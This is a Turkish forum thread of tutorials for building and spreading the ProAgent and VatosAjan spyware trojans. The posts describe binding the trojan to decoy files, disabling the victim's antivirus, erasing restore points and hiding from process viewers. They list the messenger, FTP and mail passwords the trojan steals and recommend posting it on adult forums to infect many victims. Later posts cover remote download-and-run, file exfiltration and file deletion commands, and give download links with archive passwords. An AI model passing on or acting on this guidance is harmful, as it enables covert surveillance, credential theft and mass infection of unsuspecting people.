+ Konu Cevaplama Paneli
1. Sayfa - Toplam 14 Sayfa var 1 2 3 11 ... SonuncuSonuncu
Gösterilen sonuçlar: 1 ile 10 ve 139
Like Tree1Beğeni

Konu: Ajan Dosya Yapmak İstermisiniz İşte ProAgent-2.1 ve Kullanım Tarifi

  1. #1
    Ehil Üye zeet06 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Jul 2008
    Mesajlar
    1.022

    Lightbulb Ajan Dosya Yapmak İstermisiniz İşte ProAgent-2.1 ve Kullanım Tarifi




    ProAgent-2.1-Geniş Açıklama

    İNDİR


    PROAGENT NEDİR ?:

    ProAgent casus yazılımı günümüzün en güçlü ve yetenekli izleme / takip etme yazılımlarından birisidir.

    ProAgent eşinizin, çocuklarınızın, çalışanlarınızın ya da istediğiniz herhangi bir kimsenin bilgisayar başında yaptıklarını takip etmek için mükemmel bir çözümdür!

    ProAgent klavyede basılan tüm tuşları, tüm aktif pencere yazılarını, ziyareet edilen tüm web sitelerini, bilgisayarda kullanılan yazılımların kullanıcı adı ve şifreleri ile çok daha fazlasını, server oluştururken belirttiğiniz e-mail adresinize rapor eder, hem de tamamen gizli olarak!

    ProAgent her türlü sistemde sorunsuz çalışacak şekilde tasarlanmıştır. PC'nin bir firewall arkasında olması, router arkasında ya da ağ içinde olması ProAgent için hiç bir sorun teşkil etmez. ProAgent tüm bu durumlarda sorunsuzca çalışmasını sürdürür...

    PROAGENT NE İŞE YARAR ? :

    ProAgent ile hedeflediğiniz bilgisayardaki tüm şifreleri alabilir, o bilgisayarın klavyesi ile yazılan her yazıyı okuyabilir, hedef bilgisayarın ne zaman online ne zaman offline olduğunu yada hangi siteleri ziyaret edip hangi Chat programlarını kullandığını öğrenebilirsiniz.

    ANTİVİRÜS VE FİREWALL PROGRAMLARINCA TANINIR MI ? :
    Ücretsiz ProAgent türü olan herkese açık sürüm tüm anti virüsler ve firewalllar tarafından tanınmaktadır. Anti virüslere yakalanmayan server sahibi olmak isteyenler ProAgent Special Edition satın almalıdır. ProAgent Special Edition hakkında detaylı bilgi için buraya tıklayınız. Yada sale@spyinstructors.com adresine mail atınız.

    PROAGENT SERVERIMI ÇALIŞTIRACAĞIM BİLGİSAYARIN NE TÜR BAĞLANTISI OLDUĞUNUN BİR ÖNEMİ VAR MI ? roAgent serverını çalıştıracağınız bilgisayarın internete bağlanması yeterlidir. Ağ içinde olması yada modem veya router arkasında olması hiçbir şeyi değiştirmez ProAgent her şart ve koşulda sorunsuz olarak çalışmaktadır.

    HAN İŞLETİM SİSTEMLERİNDE ÇALIŞIR ? roAgent server'ı ve client'i Windows 98 - 98SE - ME - 2000 - XP - 2003 ve Loghorn işletim sistemlerinde sorunsuz olarak çalışacak şekilde tasarlanmıştır.

    YAPILMASINDAKİ ve YAYILMASINDAKİ AMAÇLAR NELERDİR ? :
    ProAgent özellikleri de göz önünde bulundurulduğunda eksiksiz bir casus yazılım olarak görünüyor olabilir. Ancak asıl yapılma ve yayılma amaçları ProAgent aracılığıyla kişilere zarar vermenizi yada izinsiz izlemenizi sağlamak değildir.

    ProAgen'tin yapılışındaki asıl amaçları kendinize ait yada sizin sorumluluğunuzda ki bilgisayarları kullanan kişileri kontrol altında tutabilmenizi sağlamak ve gerçek bir casus yazılımın çalışma ve işleyiş biçimini tam olarak anlayıp öğrenmenize yardımcı olabilmektir. Örneğin ProAgent kullanan bazı ebeveynler çocuklarının hangi siteleri ziyaret ettiklerini takip ederek onları internetin kötülüklerinden uzak tutabilir. Yada
    bazı işverenler çalışanlarının bilgisayarlarını ne amaç ile kullandıklarını takip edebilir.

    Bu sayede gerçek bir casus yazılımın tam olarak neler yapabileceğini anlayarak PC güvenliğinizi en üst düzeyde tutabilir, kendinizi bu tür durumlara karşı hazırlayabilirsiniz.

    Bu amaçlar doğrultusunda işleyişin gerçekçi olabilmesi için gerek ProAgent üzerinde gerekse yardım menüsünde tüm anlatımlarda ve ProAgent ile ilgili kalan tüm envanterlerde olayların gerçeğe yakın olmasına ve ProAgent'in gerçek bir casus gibi görünmesine ve işlemesine çalışılmıştır. Yinede ProAgent'i kötü amaçlarla kullanan kişilerin olabileceği göz önünde bulundurularak. Bu durumdan kimseyi mağdur etmemek için ProAgent builder'ine ProAgent serverını kaldırabilme özelliği eklenmiştir. ProAgent kullanan kötü amaçlı kişiler tarafından rahatsız edilen kullanıcılar ProAgent builder'ini indirip sistemlerinde ki ProAgent serverını kaldırabilirler.

    ProAgent'i bu amaçları dışında kullanarak Internet yasalarına aykırı herhangi bir işlem gerçekleştiren kimselerin yaptıklarının sorumluluğu SIS-Team ve programın yapımcıları tarafından asla kabul edilmez.

    YASAL SORUMLULUKLARI NELERDİR ? :
    ProAgent Progra****n yanlış yada doğru kullanımından doğabilecek her türlü sorumluluk tamamıyla ProAgent'i kullanan kişi veya kişilere aittir. Oluşabilecek hiç bir aksilikten, kullanılan sistemlere verebileceği her hangi bir zarardan yapımcıları hiç bir şekilde mesul tutulamaz. Programı kullanmayı kabul eden herkes bu şıkların hepsini de kabul etmiş sayılacaktır. Şıkları kabul etmeyen kişiler ProAgent'i sistemlerinden silme konusunda özgürdürler.

    ÇALIŞMA MANTIĞI NEDİR ? roAgent iki parçadan oluşur. Bu parçalardan birisi sitemizden indirdiğiniz ProAgent paketinde "ProAgent.exe" olarak adlandırılan ProAgent Builder'idir. Bu Builder'i kullanarak kendinize bir Server oluşturursunuz oluşturmuş olduğunuz bu Server dosyası da bahsi geçen ikinci parçadır.

    Size bilgilerinin gelmesini istediğiniz bilgisayarda bu server dosyasını çalıştırmalı yada çalıştırtmalısınız. Server dosyası çalıştıktan sonra o bilgisayardan, serverı oluştururken Builder'e yazmış olduğunuz mail adresine bilgi mailleriniz gelmeye başlayacaktır.

    Kısacası ProAgent builder'ini çalıştırarak sisteminize ProAgent bulaştırmış olmazsınız. ProAgent'i bulaştırmak için öncelikle Builder'i kullanarak bir server oluşturmalı ve sonra bu serverı çalıştırmalısınız.

    SERVER OLUŞTURMA :

    Bu kısım çok önemlidir Ajanın oluşum sürecidir

    * Öncelikle antivirüs programlarınızı kapatınız. Çünkü antivirüs programları oluştrduğunuz server dosyanızı otomatik olarak silecektir.


    Not: E-mail kısmına kendi e-mailinizi yazınız.


    Öncelikle ProAgent'i çalıştırın ve "Send Menu" bölümünden size gönderilecek olan mailde yer almasını istediğiniz bilgilerin kutularını işaretleyin. Daha sonra "Options" bölümünden serverınızın hedef bilgisayarda çalıştırıldığında yapmasını istediğiniz işlemleri belirleyin. Ve "Server Icon" kısmında serverınıza uygun bir simge belirleyin. Vede serverınızı bir dosya ile birleştirmek ( yani bir cafcaflı görüntüye sahip kandıran bir dosya ) istiyorsanız "Bind with File" bölümünü kullanarak birleştirme işlemini gerçekleştirin. Son olarak "Notification" kıs**** mail adresinizi yazıp sağ alttaki "Create Server" butonuna tıklayın. Serverınız ProAgent builderi ile aynı klasörde oluşturulacaktır. Bu serverı sadece hedeflediğiniz bilgisayarda yada bilgisayarlarda çalıştırmaya dikkat edin. Server çalıştırıldığında belirlediğiniz ayarlar doğrultusunda size mailler göndermeye başlayacaktır. Gelen maillerdeki kriptolu bölümü farenizle kopyalayın ve Builderüzerindeki "Decryptor" butonuna tıklayarak açılan yeni pencereye yapıştırın. İşlem sonucunda açılan yeni pencerede farede ki kriptolu veriyi kriptosuz olarak göreceksiniz.

    SERVER TEMİZLEME Diyelim ki olmasını istemediğiniz birşey oldu ve oluşturduğunuz serverı kaza ile kendi sisteminizde çalıştırdınız. ProAgent serverını temizlemek için yapmanız gereken tek şey ProAgent Builder'inin üzerindeki "Remove Server" butonuna tıklamaktır. İşlem sonucunda sisteminizde ProAgent serverı var ise ve bu server Lokal Server Korumasına sahip değilse sisteminizden temizlenir ve açılan bir bilgi penceresinde sonuç size bildirilir. Ancak silmeye çalıştığınız server Lokal Server Korumasına sahipse Builder bu serverı kaldıramaz.

    BÖLÜM AÇIKLAMALARI :

    Bu kısımda göreve göndereceğin ajan dosyayı görevlendiriyorsun.
    Komutan PC nin emirleri:
    Select Language : Konuşma dilini belirleyin


    Bu menüden geçerli bir lisan seçebilirsiniz. Ek olarak, eğer bir lisan dosyasını herhangi bir dile tercüme eder ve onu "language" klasörünün içine kaydederseniz, çevirisini yapmış olduğunuz dil de bu menüde listelenecek ve kullanılabilir hale gelecektir.

    Send Menü : Kurban Menülerini karargaha gönder


    Send Passwords : Kurban şifrelerini karargaha gönder
    ProAgent Serverının çalıştırıldığı sistemdeki şifreleri mailinize göndermesini istiyorsanız bu kutuyu işaretleyin.

    Send CD-Keys : Kurban CD-Keylerini karargaha gönder
    ProAgent Serverının çalıştırıldığı sistemdeki oyun ve programların CD Key'lerinin mailinize göndermesini istiyorsanız bu kutuyu işaretleyin.

    Send KeyLoger: Kurban klavye yazışmalarını karargaha gönder

    proAgent Serverının çalıştırıldığı sistemdeki klavye ile yazılan her yazının mailinize göndermesini istiyorsanız bu kutuyu işaretleyin.

    Send Virtual Keyboard Logs : Kurban sanal klavye ile yazdıklarını karargaha gönder
    ProAgent Serverının çalıştırıldığı sistemdeki Virtual Keyboard (Sanal Klavye) Loglarının size gönderilmesini istiyorsanız bu özelliği işaretleyin. (Virtual Keyboard Logları size bir ZIP dosyası içinde maila ataçlanmış halde gönderilecektir.)

    Send System Information : Kurban bilgasayarının bilgilerini karargaha gönder
    ProAgent Serverının çalıştırıldığı bilgisayarın sistem bilgilerinin mailinize göndermesini istiyorsanız bu kutuyu işaretleyin.

    Send Address Book : Kurban adres defterinin içeriğini karargaha gönder
    ProAgent Serverının çalıştırıldığı sistemdeki adres defterinde yer alan kayıtların mailinize göndermesini istiyorsanız bu kutuyu işaretleyin.

    Send URL History: Kurban internet sörf kaydını karargaha gönder

    proAgent Serverının çalıştırıldığı sistemdeki browser ile ziyaret edilen sitelerin kayıtlarının mailinize göndermesini istiyorsanız bu kutuyu işaretleyin.

    Send Processes Log : Kurban kullandığı programların listesini karargaha gönder
    ProAgent Serverının çalıştırıldığı sistemdeki çalışan uygulama kayıtlarının mailinize göndermesini istiyorsanız bu kutuyu işaretleyin.

    Options : Seçenekler

    Give a fake error message : Kurbanın bilgisayarına sahte mesaj ver
    Serverınız hedef bilgisayarda çalıştırıldığında sahte bir hata mesajı versin ve çalışmamış gibi görünsün istiyorsanız bu kutuyu işaretleyin ve açılan "fake message" penceresindeki "Enter Error Message: " kutusuna serverınız çalıştırıldığında görünmesini istediğiniz hata mesajını yazın. Ve "OK" butonuna tıklayın.

    Melt server on install : Kurbanın bilgisayarındaki kendi kaydımızı sil

    Bu kutuyu seçili hale getirirseniz serverınız hedef bilgisayarda çalıştırıldığında bulaşma işlemi gerçekleştikten sonra görünen kısmı otomatik olarak silinir. Ve serverınız bir dosya ile birleştirilmişse geriye sadece birleştirildiği dosya kalır.

    Disable AntiVirus Programs : Kurbanın antivirusunu devre dışı bırak
    Bu kutuyu seçili hale getirirseniz serverınız hedef bilgisayarda çalıştırıldığında birçok anti virüs yazılımı otomatik olarak kapatılır.

    Clear Windows XP Restore Points : Kurbanın sistemini yedekleyerek varlığımızı kalıcı kılıyoruz
    Bu kutu seçiliyken serverınızı oluşturduğunuzda, serverınızın çalıştırıldığı sistem Windows XP ise Sistem Geri Yükleme özelliği kapatılır ve o ana kadar oluşturulmuş tüm sistem yedekleri silinir. Böylece hedef sistemde sistem geri yükleme özelliği kullanarak ProAgent serverının çalıştırıldığı tarihten önceki bir tarihe geri yükleme yapılarak serverdan kurtulma olanağını engellemiş olursunuz.

    Protection for removing Local Server : Kurbanın bilgisayarına bulaştıktan sonra ajanımızı koru
    Bu kutu seçiliyken serverınızı oluşturursanız hedef bilgisayarda çalıştırılan ProAgent serverı ProAgent Builder'i üzerindeki "Remove Server" butonuna tıklayarak kaldırılamaz.


    Server Extensions : ajan dosyamızın dosya uzantısını belirler
    Bu menüden oluşturulacak serverın uzantısını otomatik olarak belirleye bilirsiniz.

    Uyar: ".cmd" uzantısı sadece Windows Nt tabanlı sistemlerde çalışabilir! (NT, 2000, XP, 2003, vs...)

    Advanced Settings Menu : gelişmiş ayarlar

    Invisibility Options : ajanımızın gizlenmesi ile ilgili ayarlar
    Buradan server için pek çok gizlilik ayarını belirleyebilirsiniz.

    Injection Options : Kurbanın bilgisayarına bulaşma metodu

    Buradan server kullanacağı enjeksiyon metodunu ayarlayabilirsiniz. (Varsayılan browsera enjekte, varsayılan e-mail progra**** enjekte ve ekjeksiyon kullanılmasın seçenekleri mevcuttur).

    Sending Mail : ajan dosyamızın bilgi gönderme peryodunu ayarlıyoruz

    Bu bölümde serverın size mail gönderme periyodu ayarlarını düzenleyebilir ve farklı bir smtp server / port kullan özelliklerini aktif edebilirsiniz.

    Delay Execution : ajanımızın çalışma zamanını belirliyoruz

    Buradan server için iki farklı gecikmeli çalışma metodundan birini seçebilirsiniz. (Server ilk restarttan sonra aktif edilsin veya belirlenen tarihten sonra aktif edilsin seçenekleri mevcuttur).

    Automatic Uninstall : ajanımızın görevinin bitişini belirliyoruz

    Eğer bu özelliği seçerseniz, server kendisni burada belirlenen tarihte otomatik olarak temizleyecektir.

    Ajanımızın KABİLİYETLERİ :- Task manager,Process explorer(sysinternals) vs.. gibi tüm process viewerlarda process görünmez!
    - Hiçbir explorer programında sisteme çıkardığı dosyalar görünmez!
    - regedit.exe,msconfig,autorun.exe (sysinternals)vs.. gibi hiçbir registry programında, registry anahtar ve değerleri görünmez!
    - Varsayılan browsera dll inject ederek Firewall'ları bypass eder ve direkt mail gönderir!
    - Zone-alarm'ın son versiyonu vs.. gibi yeni jenerasyon firewall'ları bypass etmek için yeni injecting teknikleri kullanılmaktadır!
    - Mail göndermek için asla sizin SMTP server'ınıza gereksinim duymaz. Direkt MX servera gönderir.
    - Otomatik olarak kaldırılabilme özelliği sunmaktadır.
    - Gecikmeli çalışma özelliği.
    - Bir kullanımlık server özelliği.
    - Virtual Keyboard Logging Teknolojisi!


    ŞİFRELER ve BİLGİLER :

    - Cute FTP
    - Ipswitch WS_FTP
    - FileZilla FTP
    - FlashFXP FTP
    - FAR FTP
    - Peer FTP
    - eXeem
    - SendLink
    - FtpNow
    - DeluxeFtp
    - DeluxeFtp Pro
    - Morpheus
    - BitComet
    - FireFly

    - MSN Messenger
    - Windows Messenger
    - Yahoo Messenger
    - AOL Instant Messenger
    - GAIM

    - Microsoft Outlook
    - Outlook Express
    - Eudora Mail
    - IncrediMail
    - The Bat!
    - Group Mail Free
    - Netscape

    - ICQ 99b
    - ICQ 2000a
    - ICQ 2000b
    - ICQ 2002a
    - ICQ 2002b
    - ICQ 2003a
    - ICQ 2003b
    - ICQ Lite
    - ICQ2GO
    - ICQ 4.x
    - ICQ 5.x
    - Miranda
    - Trillian
    - &RQ (ICQ client)
    - Chat Anywhere

    - Internet Explorer üzerinde saklanan tüm şifreler
    - Tüm Internet Explorer üzerinde saklanan şifre korumalı sitelerin şifreleri
    - MSN Explorer üzerinde saklanan tüm şifreler
    - Win/Total Commander
    - RAS
    - Dial-Up (9x-me-2000-XP-2003)
    - Bir çok oyuna ait seri numaraları

    - Tüm keylog kayıtları ve kaydın tutulduğu pencerenin bilgileri (çoklu dil desteği!)
    - Tüm Virtual Keyboard (Sanal Klavye) kayıtları
    - Sisteme yüklenen tüm programların listesi
    - Tüm adres defteri kayıtları
    - Ses kartı bilgisi
    - Ekran kartı bilgisi
    - İşlemci bilgisi
    - Tüm özel sistem (shell) dizinlerinin listesi
    - Windows sistemine ait tüm genel bilgiler
    - Fiziksel bellek (RAM) durumu
    - Pc açık kalma süresi ve çok daha fazlası


    Uyar: ".cmd" uzantısı sadece Windows Nt tabanlı sistemlerde çalışabilir! (NT, 2000, XP, 2003, vs...)

    Advanced Settings Menu :

    Invisibility Options :

    Buradan server için pek çok gizlilik ayarını belirleyebilirsiniz.

    Injection Options :

    Buradan server kullanacağı enjeksiyon metodunu ayarlayabilirsiniz. (Varsayılan browsera enjekte, varsayılan e-mail progra**** enjekte ve ekjeksiyon kullanılmasın seçenekleri mevcuttur).

    Sending Mail :

    Bu bölümde serverın size mail gönderme periyodu ayarlarını düzenleyebilir ve farklı bir smtp server / port kullan özelliklerini aktif edebilirsiniz.

    Delay Execution :

    Buradan server için iki farklı gecikmeli çalışma metodundan birini seçebilirsiniz. (Server ilk restarttan sonra aktif edilsin veya belirlenen tarihten sonra aktif edilsin seçenekleri mevcuttur).

    Automatic Uninstall :

    Eğer bu özelliği seçerseniz, server kendisni burada belirlenen tarihte otomatik olarak temizleyecektir.


    bitti

    Aşağıdaki extra bilgileri inceleyiniz
    Aşamalar tavsiyeler
    1-Program sayesinde Trojanımızı oluşturuyoruz ( mp3 icon unu seçmenizi tavsiye ederim)
    2-Oluşturduğumuz severi bir rar dosyasına atıyoruz.
    3-Bu Rar dosyasına bir URL adresi alıyoruz. Buradan alabilirsiniz
    4-Bu Almış olduğumuz URL yi Herhangibir forum sitesinde yayınlıyoruz.
    5-Mail leri bekliyoruz

    Bunlardan birisi Muhakkak severimize URL adresi almaktır . Çünkü severimizi paylaşmak için yayınlamamız lazım ve bunuda sanal yoğunluğun çok olduğu yani online üyelerin çok olduğu forumlarda yapabiliriz... Genelde abaza takımlarının kullandığı Adult içerikli sitelerde yayınlamanızı tercih ederim çünkü 10 dk dan bir sürü kişi trojan yiyor

    Umarım anlamışınızdır...

    Not : Arkadaşlar bu ilem sadece Proagent için değildir... PRORAT - TURKOJAN - VATOS AJAN gibi bir çok casus yazılımdan oluşturduğunuz trojanınızı link sistemi üzerinden herkese yollayabilirsiniz...
    Lütfen Bizleri Salak Yerine Koyup, SpyGrup sitemizde böyle bir eylemde

    bulunmayınız...




  2. #2
    Dost scbobydoo - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2008
    Mesajlar
    24

    Standart

    slm kardes ben proagent kurdum ama bana mail gelmedi hatta vatos ajanda kuruorum mail gelmior neden böle yapıor acaba yoqsa benim mailde mi sorun var yoqsa programda mı mailde bencede sorun yok cünkü önceden mail gelmior bana acıklar mısın lütfen cevabını bekliorum bana yardımcı ol

  3. #3
    Ehil Üye zeet06 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Jul 2008
    Mesajlar
    1.022

    Standart

    Haklısınız.
    Hotmail, yahoo türü mail sunucuları dosyanın virus içermesi nedeniyle kabul etmeyebilir. Bu işle özel ilgileniyorsanız, kendi mail sunucunuz oluşturmanız en sağlamıdır;tabi bu işlem için domain sahibi olmanız gerekiyor.Bunun dışında bir çözüm için ise henüz bir araştırma yapmadım ama mynet ile başlayabilirsiniz.
    Sözün özü virus koruması zayıf olan bir mail sunucu tercih etmeniz bu işlem için çok uygun olacaktır.
    Size mailin gelmemesinin nedeni,
    -karşı bilgisayar gelişmiş virus korumasına sahiptir; virusu atmadan önce antivirus programlarını devre dışı bırakmanız yararınaza olacaktır.
    -sahip olduğunuz mail sunucusu kendisine gelen mailleri virus taramasından geçirip tehlikeli olduğunu saptarsa, gelen maili rededebilir.

    *Ünlü mail sunucuları bu tür spy trojen hizmetlerini kabul etmiyorlar.

  4. #4
    Dost scbobydoo - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2008
    Mesajlar
    24

    Standart

    kardes gene kurdum ama mail gelmedi hatta mail i test ediyom ama bir türlü göndermiyor mail olarak mynet msn yahoo hepsini denedim olmadı biraz daha detaylı olarak anlatırsanız seivinirim [orada anlatılanları uyguluyorum olmuyor hatta mail süresini 30 dk yapıorum]

  5. #5
    Dost scbobydoo - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2008
    Mesajlar
    24

    Standart

    ya kardes dben bu işle ilgileniyorum ben bunu kurmak için 1 ay ugrasıom domain sahibi nasıl olacam onuda bilmiyorum önceden vatos ajan programını kullanıyordum onda da server kuruyom gelmiyor ondada ne yapacagımı sasırdım bana bir yardımcı ol yani bana cok lazım çünkü az önce yine server kurdum mail test et diyorum (Mail gönderiliyor,lütfen bekleyiniz diyor) dve orda kalıyor sadece bana bir yardımcı olursan sevinirim cok ciddi ilgileniyorum bu programla ??

  6. #6
    Ehil Üye zeet06 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Jul 2008
    Mesajlar
    1.022

    Lightbulb Proagent'te artik mail problemlerine son

    PROAGENT'TE ARTIK MAIL PROBLEMLERINE SON


    Bu konuda yaptığımız araştırma neticesinde problemin esas nedeninin Proagent programının üretici firmanın serveriyle haberleştiği ve elde ettiği spy bilgilerin carbon kopyasının bir nüshasını kendi serverlerine gönderdikleri ve parayla satın alınmayan crack proagentlerin bu server tarafından sınırlandığı ve hatta devre dışı bırakıldıkları saptanmıştır.

    Problemin esas çözümünün satın alınma yoluyla kesin giderildiği ve bununla birlikte xp sp1 kullanılması deneyimli hackerlar tarafından tavsiye edilmiştir.

    Hackerlerin yaptıkları spy mail deneylerinde, gmail ve yahoo mail sunucularının spy mailler için çok uygun mail sunucular olduğu görülmüştür.

    Yapılması gerekenler:
    Çok profesyoneller için,
    -Orijinal sürüm proagent v-2.1.9 S.E. sürümünü satın alıp yükleyin
    -Xp Sp1 işletim sistemi yükleyin
    -Firewall ve antivirusleri devre dışı bırakın
    -Kendi mail sunucunuzun adresini veya yahoo veya gmail deneyin yahoo tavsiye edilir.

    Proagent v-1.2.9 S.E. indir

    ProAgent'ta mail Problemine SON !! "Gelişmiş Ayarlar"la artık Hiçbir sorun Kalmayacak
    ((ProAgent Detaylı Anlatımı İçin TIKLAYIN!))


    Trojan ve keylogger/stealer'larımızı yenilemeye, sorunları gidermeye devam ediyoruz!

    Pek fazla kullanıcı tarafından bilinmeyen proagent gelişmiş ayarları ile mail problemini ortadan kaldırıyoruz artık..

    Döküman tamamen tarafıma, yani TuRK_HaRD'a aittir bu arada..

    İhtiyacımız bir tek Gmail mail adresi


    Resimli anlatıma başlayalım.. İlk olarak programımızı açalım (Download linki aşağıda..)

    ve "Select Language"den dilini "Türkçe"ye çevirelim ki daha anlaşılır olsun:



    Ardından "Gelişmiş Ayarlar" menüsünden "Ayarlar"a tıklayalım:



    Önemli kısım burası.. Alttaki resimdeki gibi "Benim smtp Serverımı kullan" ve

    "Farklı bir smtp protu kullan" kısımlarına tik atalım.. Ve smtp server adresimizi ve portunu girelim:



    İstersek yine bu ayar sayfasında "Mail Gönderme" bölümünde,

    kurbanın bilgisayarından kayıtların bir kere gönderilmesini, ardından server'ın silinmesini ayarlayabiliriz..

    Yine server için bir kaldırılma tarihi belirleyebilirsiniz ("Otomatik Kaldırma" bölümünden)


    Gmail'in "SPAM" klasörüne bakıyoruz.. ve işte test maili gelmiş


    Resim otomatik olarak küçültüldü. Buraya tıklayarak resmi orjinal boyutlarında görüntüleyebilirsiniz. Resmin orjinal boyutu 863x432 büyüklüğü 89KB.


    Böylece artık "Proagent'tan mail alamıyorum", "Test mesajı bile gelmiyor",

    "Mail servisi çalışmyor" yakınmalarından kurtulmuş oluyoruz..


    ProAgent v2.1 SE Download = http://rapidshare.com/files/39457145..._TuRK_HaRD.rar

    rar şifresi = turk_hard


    kolay gelsin, iyi çalışmalar herkese..

    bu makale için byTürkHard'a teşekkür ediyoruz

    Umarım bu makale sorunları çözer; çözmezse yazınız çaresine bakalım.

  7. #7
    Ehil Üye zeet06 - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Jul 2008
    Mesajlar
    1.022

    Lightbulb Vatos Ajan Nedir? Nasıl Kullanılır

    Sürüm:Dil:TürkçeBoyut:1.09 MBPlatform:Windows(Tümü)Lisans:ÜcretsizTelif:Vatosajan.d0gma.org Tarih:05.01.2007
    VATOS AJAN İNDİR

    Program Açıklama


    VatosAjan bulaştığı bilgisayarın özelliklerini,kurbanın şifre ve keylog kayıtlarını mailinize gönderen, Sadece VatosAjanda bulunan WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin
    kurbanın bilgisayarında dosya arama,
    dosya silme,dosyaları mailinize gönderme,
    internetten program indirip çalıştırabilme,
    kayıtlı mail adresinizi değiştirebilme,
    registry kayıtlarına ulaşabilme ve kendisini silme emirlerini uygulayabilecek interaktif bir casus yazılımdır.
    Server boyutu sadece 45 kb. olup dünyanın en küçük casus yazılımlarından biridir.
    VatosAjan Windows görev yöneticisinde görünmez.
    VatosAjan kendisini ve kullandığı tüm dosyaları disk üzerinde gizler.
    Registrye bilgilerinizi kaydetmez.
    VatosAjan kendisini default browsere enjekte ederek firewall engelini aşar.
    VatosAjana özel dosya birleştirme kodu sayesinde serverde ek boyut artışı olmaz(sadece server + dosya)
    Server Oluşturma
    -İletim Bilgileri alanına mailinizi ve kullanmak istiyorsanız Web Kontrol adresinizi yazınız.
    -Web Kontrol kullanıp kullanmamanız size mail gelmesini etkilemez.
    -Mail adresinize mail gönderilip gönderilmeyeceğini test ediniz.
    -Mail gönderildi mesajı gelse dahi Mail adresinizi kontrol ediniz.
    -Web Kontrol kullanacak iseniz aranmasını istediğiniz dosya uzantısını seçiniz.
    -Bulunan sonuçlar ilk mailde gelecektir.
    -Ayarlar bölümünden istediğinizi seçiniz.
    -Serveri kendi bilgisayarında denemek isteyenlere geri yükleme noktasını silme ve
    -Firewall ve antivirusleri kapatma seçeneklerini seçmemelerini öneririm.
    -Kaspersky bile bir daha çalışamıyor.Ancak tekrar kurmak gerekiyor.Benden uyarması...
    -Serverin default uzantısı exe dir.İsterseniz değişik bir uzantı seçebilirsiniz.
    -Server Simgesini değiştirmek için "Simge Seç" butonuna basınız ve açılan formdan bir simge seçiniz.
    -Başka bir dosya ile birleştirmek için "Dosya Seç" butonuna basınız ve dosyanızı seçiniz.
    -Son olarak "Server Oluştur" butonuna basınız.Serveriniz hazırlanmıştır.
    Bilinmesi Gerekenler
    -Server çalıştıktan sonra internetten çalışması için gerekli pluginleri dowload eder.
    -Pluginleri download edeceği adres plugin butonuna basılarak görülebilir ve değiştirilebilir.
    -Eğer free host değilde ücretli hostunuz var ise plugin adresinden plugin.exe yi kendi hostunuza alabilirsiniz.Free hostunuz varsa adresini değiştirmenizi kesinlikle önermem.
    -İlk Mailde şifrelerin gelmemesi normal bir durumdur.İkinci Mailden itibaren şifreler gelecektir.
    -Web Kontrol Kullananların seçtikleri dosya uzantısı aranarak ilk maille sonuç find.txt olarak gönderilir.
    -Server kill edildikten sonra browser Runtime Error hatası vermektedir.Eğer kendinizde denediyseniz Serveri temizledikten sonra görev yöneticisinden browseri de kapatınız.
    -Bilgisayarda CuteFTP,FlashFXP ve WSFTP Programlarının kayıt dosyaları aranır. Kayıt bulunursa ek dosya olarak gönderilir.
    -Gönderilecek ek dosya olmadığı zaman dahi Empty.txt isimli boş bir dosya gönderilir. Neden diye sormayın öyle işte...
    -Tercüme, Web tasarım ve photoshop ile ilgilenen ve projeye katkı sağlamak isteyenler benimle irtibata geçerlerse memnun olurum.
    Alınabilen Şifreler
    # .NET Passport account
    # MSN Messenger
    # Windows Messenger (Windows XP için)
    # Yahoo Messenger (Versiyon 5.x ve 6.x)
    # ICQ Lite 4.x/2003
    # AOL Instant Messenger
    # AOL Instant Messenger/Netscape 7
    # Trillian
    # Miranda
    # GAIM
    # Gmail
    VatosAjan Web Kontrol Emir hazırlama
    Kurbanın bilgisayarına Web Kontrol ile ulaşabilmek için kurbanın bilgisayarının adını bilmelisiniz.
    Bu bilgi serverin gönderdiği maildeki ComputerName Karşında yazıyor.
    Yapılacak işlemler:
    1-VatosAjan Programınında Web Kontrol yazan butona tıklayın
    2-Kurbanın Bilgisayar adını yazınız.
    3-Emirlerden birini seçiniz.
    4-Bu adım Seçtiğiniz emire göre değişiyor.
    Find
    Açıklama :Bu emir kurbanın bilgisayarında istediğiniz uzantıdaki dosyaları arayarak sonucun size gönderilmesini sağlar.
    Kullanımı :Açılır kutudan aranmasını istediğiniz dosya uzantısını seçiniz ve Tamam butonuna basınız.
    DownloadAndRun
    Açıklama :İnternet adresini verdiğiniz bir programı kurbanın bilgisayarına download eder ve çalıştırır.
    Kullanımı :Kutuya çalıştırılmasını istediğiniz programın internet adresini yazınız.
    Send
    Açıklama :Kurbanın bilgisayarında bulunan dosyaların mailinize gönderilmesini sağlar. Bu emri verebilmek için size gönderilmesini istediğiniz dosyanın kurbanın bilgisayarındaki tam yolunu bilmeniz gerekir.Find emrinin sonucunda gelen mailden kopyala yapıştır yapabilirsiniz.
    Kullanımı :Kutuya istediğiniz dosyanın yam yolunu yazınız.
    DeleteFile
    Açıklama :Kurbanın bilgisayarında bulunan dosyaları sildirir.İstediğiniz sayıda dosya sildirebilirsiniz.
    Kullanımı :Silinmesini istediğiniz dosyaların tam yolunu yazınız ve Ekle butonuna basınız. Dosyaları eklemeniz bitince Tamam butonuna basınız.
    Mail
    Açıklama :Bu emir ile serverde kayıtlı mail adresinizi değiştirebilirsiniz.
    Kullanımı :Yeni Mailinizi kutuya yazınız ve tamam butonuna basınız.
    Registry
    Açıklama :Kurbanın bilgisayarının registry bilgilerine ulaşmanızı sağlar.
    Kullanımı :Önce Rootkeyi Seçiniz.Sonra bilgilerini almak istediğiniz Registry anahtarını kutuya yazınız.
    KillServer
    Açıklama :Serverin kendinietmesini sağlar.
    Kullanmı :Sadece Tamam butonuna basınız.
    5-Web Kontrol Emriniz hazırlandı ve kurbanın bilgisayarının adı ile kaydedildi.
    Bu dosyayı web kontrol adresinize upload ediniz. Kurbanınız online ise Server en geç 3 dakika içinde emrinizi yerine getirir.
    Programın kullanımdan doğabilecek zararlar programamı kullanan kişiye aittir.
    ZİP ŞİFRESİ:vatos

  8. #8
    Dost scbobydoo - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2008
    Mesajlar
    24

    Standart

